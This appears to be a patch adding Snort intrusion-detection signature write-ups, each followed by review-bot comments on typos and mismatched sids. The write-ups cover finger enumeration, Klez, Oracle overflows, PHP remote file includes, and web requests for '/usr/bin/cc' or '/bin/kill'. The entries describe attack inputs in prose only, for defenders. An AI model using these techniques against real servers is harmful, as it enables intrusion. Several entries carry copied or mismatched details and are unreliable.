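Review bot: Stray space in the version under Affected Systems: "ISC INN 2.4 .0" should be "2.4.0". Additional References is empty although Corrective Action tells the reader to upgrade and apply vendor patches; an advisory link would make that actionable. Minor: "attackers choosing" needs the possessive, and "Apply the appropriate vendor supplied patches" lacks a terminating period.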
--- /dev/null
+++ b/doc/signatures/322.txt
@@ -0,0 +1,70 @@
+Rule:   
+
+--
+Sid: 322
+
+-- 
+Summary: 
+This event is genrated when an attempt is made to query the finger daemon to ascertain a list of usernames on a system.
+
+-- 
+
+Impact: 
+Information gatthering, the attacker may obtain the list of some accounts existing on the victim system as a prelude to further compromize.
+
+--
+Detailed Information:
+
+The rule is triggerred when an attempt to use a search feature in
+"cfingerd" version of a finger daemon is attempted. The search feature
+allows the attacker to obtain the lists of accounts existing on the
+target system by issuing a specially crafted finger request to
+"search" for information. Knowing the list of accounts might
+facilitate a password guessing attacks, email attacks or other abuse.
+
+--
+
+Attack Scenarios: an attacker learns that "guest" account exists and
+has never been used. He then guesses that the password for this
+account and logs in to the system remotely using telnet.
+
+-- 
+
+Ease of Attack: 
+Simple, no exploit software required
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Look for other IDS events involving the same IP addresses. 
+
+Look for suspicious logins to the affected system.
+
+Disable the finger daemon or apply a vendor patch that removes the vulnerability
+
+--
+Contributors: 
+Original rule writer Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS375
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0259
+
+--
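Review bot: Several typos: "genrated" (generated) in the Summary, "gatthering" and "compromize" in Impact, "triggerred" in Detailed Information, and "facilitate a password guessing attacks" (drop "a"). Structurally, the Attack Scenarios heading has its text on the same line ("Attack Scenarios: an attacker learns that "guest" account exists and") and "Sid: 322" is on one line, whereas the other files put the value on the line after the heading; the scenario sentence "He then guesses that the password for this account and logs in" is also missing a word. This file has no Affected Systems section although the text names cfingerd.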
--- /dev/null
+++ b/doc/signatures/548.txt
@@ -0,0 +1,57 @@
+Rule: 
+
+--
+Sid: 
+547
+
+--
+Summary: 
+This event is generated when an attempt is made to create a directory name that begins with a period on an FTP server.
+
+--
+Impact: 
+Unauthorized file storage.  An attacker may attempt to create a directory name that begins with a period on an FTP server, possibly in preparation to store unauthorized files.
+
+
+--
+Detailed Information: 
+An attacker may attempt to create a hidden directory name that begins with a period on an FTP server .  This hidden directory is hard to discover, permitting attackers to store unauthorized "warez" files, such as unlicensed or pirated software.
+
+--
+Affected Systems: 
+FTP servers
+
+--
+Attack Scenarios: 
+An attacker may attempt to create a hidden directory name that begins with a period to store unauthorized files.
+
+--
+Ease of Attack: 
+Simple
+
+--
+False Positives:
+It is remotely possible that an authorized directory exists with a name that begins with a period.
+
+--
+False Negatives: 
+Hidden directories other than those with a name that begins with a period may be created to store "warez" files.
+
+--
+Corrective Action: 
+Assign restrictive permissions to all directories so unauthorized users cannot navigate or write to them.
+
+Regularly monitor directories for sudden or drastic increased use of space.
+
+--
+Contributors: 
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+-- 
+Additional References:
+
+--
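Review bot: The Sid does not match the file name: the file is b/doc/signatures/548.txt but the body says "Sid: " / "547". One of the two is wrong; if the body describes sid 548, fix the number, otherwise rename the file, since documentation lookup is keyed on the sid. Minor: space before the period in "on an FTP server .  This hidden directory".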
--- /dev/null
+++ b/doc/signatures/1800.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+
+1800
+
+--
+Summary:
+This event is generated when an incoming email containing the Klez worm is detected.
+
+--
+Impact:
+System compromise and further infection of target hosts.
+
+--
+Detailed Information:
+W32/Klez.h@MM exploits the vulnerability in Microsoft Internet Explorer (ver 5.01 or 5.5 without SP2), enabling it to execute email attachments.
+
+Once executed, it can unload several processes including Anti-virus programs.
+
+The worm is able to propagate over the network by copying itself to network shares (assuming sufficient permissions exist). Target filenames are chosen randomly, and can have single or double file extensions.
+
+--
+Affected Systems:
+	Microsoft Internet Explorer (ver 5.01 or 5.5 without SP2)
+
+--
+Attack Scenarios:
+This virus can be considered a blended threat. It mass-mails itself to email addresses found on the local system, then exploits a known vulnerability, spreads via network shares, infects executables on the local system.
+
+--
+Ease of Attack:
+Simple. This is worm activity.
+
+--
+False Positives:
+Certain binary file email attachments can trigger this alert.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor suppled patches.
+
+Block incoming attachments with .bat, .exe, .pif, and .scr extensions 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+Symantec:
+http://securityresponse.symantec.com/avcenter/venc/data/w32.klez.h@mm.html
+
+--
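Review bot: Typo in Corrective Action: "Apply the appropriate vendor suppled patches." (supplied); the next line, "Block incoming attachments with .bat, .exe, .pif, and .scr extensions ", lacks a terminating period and has trailing whitespace. The Sid block has an extra blank line between "Sid:" and "1800", unlike the other files, which matters if the files are parsed by position. The False Positives entry ("Certain binary file email attachments can trigger this alert.") would help an analyst more if it said what in the attachment the rule matches on.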
--- /dev/null
+++ b/doc/signatures/1343.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1341
+
+--
+Summary:
+Attempted cc command access via web
+
+--
+Impact:
+Attempt to compile a binary on a host.
+
+--
+Detailed Information:
+This is an attempt to compiile a C or C++ source on a host. The cc
+command is the GNUproject's C and C++ compiler used to compile C and
+C++ source filesinto executable binary files. The attacker could
+possibly compile aprogram needed for other attacks on the system or
+install a binaryprogram of his choosing.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains
+'/usr/bin/cc'in theURI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside ofit's designated web root or cgi-bin. This command may also
+be requested on acommand line should the attacker gain access to the
+machine. Wheneverpossible, sensitive files and certain areas of the
+filesystem shouldhave the system immutable flag set to prevent files
+from being addedto the host. On BSD derived systems, setting the
+systems runtimesecurelevel also prevents the securelevel from being
+changed. (note:the securelevel can only be increased).
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1342
+sid: 1343
+sid: 1344
+sid: 1345
+sid: 1346
+sid: 1347
+sid: 1348
+
+--
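Review bot: The Sid does not match the file name: the file is b/doc/signatures/1343.txt but it says "Sid:" / "1341", and its Additional References list includes "sid: 1343" (itself) while omitting 1341, which suggests the 1341 document was copied unchanged into the 1343 slot; both the sid and the cross-reference list need correcting. Separately, the body has lost the spaces at many line joins: "GNUproject's", "filesinto", "aprogram", "binaryprogram", "'/usr/bin/cc'in theURI", "ofit's", "acommand", "Wheneverpossible", "shouldhave", "addedto", "runtimesecurelevel", "(note:the". It reads like a bad reflow and needs re-typing; "ofit's" should also become "of its".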
--- /dev/null
+++ b/doc/signatures/106-1.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+106-1
+
+--
+Summary:
+This event is generated when the pre-processor spp_rpc_decode detects
+network traffic that may constitute an attack. Specifically fragmented 
+rpc records were detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_rpc_decode pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
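Review bot: The Attack Scenarios section is empty ("Attack Scenarios:" directly followed by "--") while Ease of Attack says "Simple." and Impact says "Unknown."; for a preprocessor event, either describe why fragmented RPC records matter (evasion of inspection is the usual concern for a decoder alert) or mark both sections not applicable, so the file does not contradict itself. Typo in Detailed Information: "consititute" (constitute). That paragraph also just repeats the Summary; the Summary's own detail ("fragmented rpc records were detected") belongs in Detailed Information instead.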
--- /dev/null
+++ b/doc/signatures/2800.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2800
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure rename_shadow_column_group
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
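Review bot: Same generator artifact as 2687.txt and 2720.txt: "vulnerability in the procedure rename_shadow_column_group" / ". This procedure is included in" / "dbms_repcat." leaves a line starting with a period; join it into one sentence. Affected Systems reads "Oracle Oracle9i" and Additional References is empty. Since these three files differ only in the procedure name, fix the template that generates them rather than each file.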
--- /dev/null
+++ b/doc/signatures/100000412.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000412
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "REDAXO" application running on a webserver. Access to the file "index.inc.php" using a remote file being passed as the "REX[INCLUDE_PATH]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "REX[INCLUDE_PATH]" parameter in the "index.inc.php" script used by the "REDAXO" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using REDAXO
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
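Review bot: "ona web server" in Detailed Information should be "on a web server", and "may indicate that an exploitation attempt has been attempted" in the Summary is redundant ("may indicate an exploitation attempt"). The third Detailed Information paragraph describes credential validation in generic CGI applications rather than a remote file include via "REX[INCLUDE_PATH]", and Additional References is empty; add a reference for the REDAXO issue and consider a corrective action specific to file inclusion, such as disabling remote file inclusion in the PHP interpreter's configuration, alongside patching.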
--- /dev/null
+++ b/doc/signatures/1694.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1694
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
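Review bot: the Detailed Information sentence "This connection can either be a legitimate telnet connection or the result of spawning a remote shell" does not fit a rule about Oracle database commands and looks carried over from another description; drop it or restate it in terms of a database session. Attack Scenarios ("Simple. These are Oracle database commands.") describes ease rather than a scenario and duplicates Ease of Attack. The Corrective Action line "Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise" needs a comma after "session" and a full stop, and the port variable is written "$ORACLE_PORTS" in Detailed Information but "ORACLE_PORTS" in False Negatives; use one form.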
--- /dev/null
+++ b/doc/signatures/2503.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2503
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
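Review bot: "attcker" in Attack Scenarios should be "attacker", and the Impact section lacks the blank line before "--" that every other section has. Additional References is empty although Corrective Action points to vendor patches; add the vendor advisory for the SSL library error-handling issue so a reader can tell which patch applies.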
--- /dev/null
+++ b/doc/signatures/2075.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2075
+
+--
+Summary:
+using the upload.php script.
+
+--
+Impact:
+Unauthorized upload of files to a server.
+
+--
+Detailed Information:
+Arbitrary files can be uploaded to a server running vulnerable versions 
+of Mambo Site Server due to laxe checking in the scripts controlling 
+uploading of files.
+
+The scripts perform checks for certain file extensions but do not 
+prevent the upload of files with image extensions.
+
+--
+Affected Systems:
+	Mambo Mambo Site Server 4.0.10, 4.0.11 and 4.0.12 BETA
+
+--
+Attack Scenarios:
+The attacker can upload malicious scripts and executable files by 
+appending a valid extension used for an image file.
+
+The attacker can also use the server to store files of his choosing.
+
+--
+Ease of Attack:
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest version of Mambo Site Server.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/6572
+
+--
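Review bot: the Summary starts mid-sentence ("using the upload.php script.") and needs its leading clause restored. Ease of Attack is left empty. "laxe checking" should be "lax checking", and the second Detailed Information paragraph is ambiguous as written: per Attack Scenarios the problem is that a script is accepted once an image extension is appended, so "do not prevent the upload of files with image extensions" should say that scripts given an image extension are not rejected.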
--- /dev/null
+++ b/doc/signatures/2080.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2080
+
+--
+Summary:
+number for the rpc service lockd.
+
+--
+Impact:
+Intelligence gathering
+
+--
+Detailed Information:
+This may be an attacker probing for vulnerable versions of rpc services.
+In this case, the rpc service lockd.
+
+If a user connects to port 1024 being used by the rpc service lockd, a 
+denial of service can be issued by supplying random input to the 
+service.
+
+--
+Affected Systems:
+	Debian Linux 2.1, 2.2 pre potato and 2.2
+	MandrakeSoft Linux Mandrake 6.0, 6.1 and 7.0
+	RedHat Linux 6.0 sparc, i386 and alpha
+	RedHat Linux 6.1 sparc, i386 and alpha
+	RedHat Linux 6.2 sparc, i386 and alpha
+
+--
+Attack Scenarios:
+The attacker needs to send random data to port 1024 used by nlockmgr.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate patches for the system.
+
+Upgrade the software to the latest non vulnerable version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1372
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0508
+
+--
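Review bot: the Summary starts mid-sentence ("number for the rpc service lockd.") and needs its leading clause restored. The service is called "lockd" in Summary and Detailed Information but "nlockmgr" in Attack Scenarios; name it consistently, or state that both names refer to the same program, so a reader does not take them for two services. Detailed Information says a denial of service "can be issued by supplying random input", yet Impact lists only "Intelligence gathering"; add the DoS to Impact.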
--- /dev/null
+++ b/doc/signatures/2439.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2439
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Real Networks RealPlayer/RealOne player.
+
+--
+Impact:
+Serious. Execution of arbitrary code.
+
+--
+Detailed Information:
+RealNetworks RealPlayer/RealOne player is a streaming media player for
+Microsoft Windows, Apple Macintosh and UNIX/Linux based operating systems.
+
+A buffer overrun condition is present in some versions of the player
+that may present a remote attacker with the opportunity to execute code
+of their choosing on a client using one of these players.
+
+--
+Affected Systems:
+	Real Networks RealOne Desktop Manager
+	Real Networks RealOne Enterprise Desktop 6.0.11 .774
+	Real Networks RealOne Player 1.0
+	Real Networks RealOne Player 2.0
+	Real Networks RealOne Player 6.0.11 .868
+	Real Networks RealOne Player version 2.0 for Windows
+	Real Networks RealPlayer 8.0 Win32
+	Real Networks RealPlayer 8.0 Unix
+	Real Networks RealPlayer 8.0 Mac
+	Real Networks RealPlayer 10.0 BETA
+
+--
+Attack Scenarios:
+An attacker may supply a malformed file to the client to exploit the
+issue.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
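Review bot: the version strings "6.0.11 .774" and "6.0.11 .868" in Affected Systems contain a stray space before the final component; write each as a single version number. The vendor is "Real Networks" in Affected Systems and "RealNetworks" in Detailed Information; use one spelling. Additional References is empty although Corrective Action depends on the reader identifying the "latest non-affected version"; a vendor reference would pin that down.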
--- /dev/null
+++ b/doc/signatures/2686.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2686
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure differences
+. This procedure is included in
+sys.dbms_rectifier_diff.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
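Review bot: the procedure name "differences" in Detailed Information is followed by a line beginning ". This procedure is included in"; join the lines so it reads "vulnerability in the procedure differences. This procedure is included in sys.dbms_rectifier_diff." "Oracle Oracle9i" in Affected Systems repeats the vendor, and Additional References is empty for an issue whose only Corrective Action is "Apply the appropriate vendor supplied patch".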
--- /dev/null
+++ b/doc/signatures/411.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+411
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP IPV6 I-Am-Here datagram.
+
+--
+
+Impact:
+ICMP Type 34 datagrams are not expected network traffic.  Hosts generating ICMP Type 34 datagrams should be investigated for hostile activity.
+
+--
+
+Detailed Information:
+ICMP Type 34 is an undocumented extension to RFC 1812 and RFC 792.  Its current use it not defined by an approved RFC.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Hosts generating ICMP Type 34 datagrams should be investigated for hostile activity.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
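Review bot: "Its current use it not defined" in Detailed Information should be "Its current use is not defined". This description has no Affected Systems section, unlike the other files in the patch; add one so the format stays uniform. Attack Scenarios says "None known" while Impact and Corrective Action both say hosts generating these datagrams should be investigated for hostile activity; stating why the traffic is considered suspicious would reconcile the two. False Negatives also lacks the blank line before "--".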
--- /dev/null
+++ b/doc/signatures/100000715.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000715
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "logs.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "logs.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
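Review bot: "ona web server" in Detailed Information should be "on a web server", and "may indicate that an exploitation attempt has been attempted" in the Summary is redundant. The Sid, Affected Systems and Contributors sections lack the blank line before "--" used in the rest of the file. The third Detailed Information paragraph (credential validation in CGI applications) does not describe a remote file include via "phpraid_dir", and Additional References is empty; add a reference for the PHPRaid issue.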
--- /dev/null
+++ b/doc/signatures/1335.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+1335
+
+--
+Summary:
+Attempted kill command access via web
+
+--
+Impact:
+Attempt to stop or restart processes on a webserver.
+
+--
+Detailed Information:
+This is an attempt to either stop or restart system processes on a
+webserver. By stopping a service the attacker can effectively issue a
+"Denial of Service" to a particular process on a machine. When used to
+restart a process, the attacker can force a legitimate process to
+re-read the associated configuration file and possibly compromise the
+service by replacing the original configuration with one crafted by the attacker.
+
+The signature looks for the "kill" command in the client to
+web server network traffic and does not indicate whether the command
+was actually successful in killing the process. The presence of the
+"kill" command in web traffic indicates that an attacker attempted to
+trick the web server into executing system in non-interactive mode
+i.e. without a valid shell session.
+
+Alternatively this rule may trigger in an unencrypted HTTP tunneling
+connection to the server or a shell connection via another exploit
+against the web server.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/bin/kill'
+in the URI which can then return sensitive information on groups and
+users present on the host.  This command may also be requested on a
+command line should the attacker gain access to the machine.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Webservers should not be allowed to view or execute files and binaries
+outside of it's designated web root or cgi-bin. 
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Additional information from Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+
+man kill
+
+--
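Review bot: Attack Scenarios says a request containing "/bin/kill" "can then return sensitive information on groups and users present on the host", which describes a different command; kill signals processes, as Detailed Information itself explains, so the scenario should describe stopping or restarting a process. "executing system in non-interactive mode" in Detailed Information reads as if a word is missing after "system" (commands?), and Corrective Action has "it's" for "its". There is no Affected Systems section.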
--- /dev/null
+++ b/doc/signatures/105.txt
@@ -0,0 +1,107 @@
+Rule:
+
+--
+Sid:
+105
+
+--
+Summary:
+Dagger is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a 
+compromise of all resources the machine is connected to. This Trojan 
+also has the ability to delete data, steal passwords and disable the 
+machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows exceutable that makes 
+changes to the system registry, Win.ini and System.ini. When first 
+executed the Trojan replicates itself and in most cases, gives the copy 
+a random name. This Trojan may use the file extensions ".exe" or ".dll".
+
+The Trojan changes system startup files and registry settings to add the
+server to programs normally started on boot.
+
+	SID	Message
+	---	-------
+	104	Dagger_1.4.0_client_connect (incoming TCP connection)
+	105	Dagger_1.4.0 (outgoing TCP connection)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This 
+event is indicative of an existing infection being activated. Initial 
+compromise can be in the form of a Win32 installation program that may 
+use the extension ".jpg" or ".bmp" when delivered via e-mail for 
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. 
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+This is a particularly difficult Trojan to remove and should only be 
+attempted by an experienced Windows Administrator.
+
+Edit the system registry to remove the extra keys or restore a 
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	[HKEY_CLASSES_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]
+	[HKEY_CLASSES_USER\Software\Microsoft\Windows\CurrentVersion\Run] 
+	[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+
+Registry keys added are:
+
+	"SysManager"="C:\\WINDOWS\\System\\Manager.exe"
+
+Removal of the file Manager.exe is required. Also end the process 
+Manager.exe.
+
+A machine reboot may be required to clear the existing process from 
+running in memory.
+
+--
+Contributors:
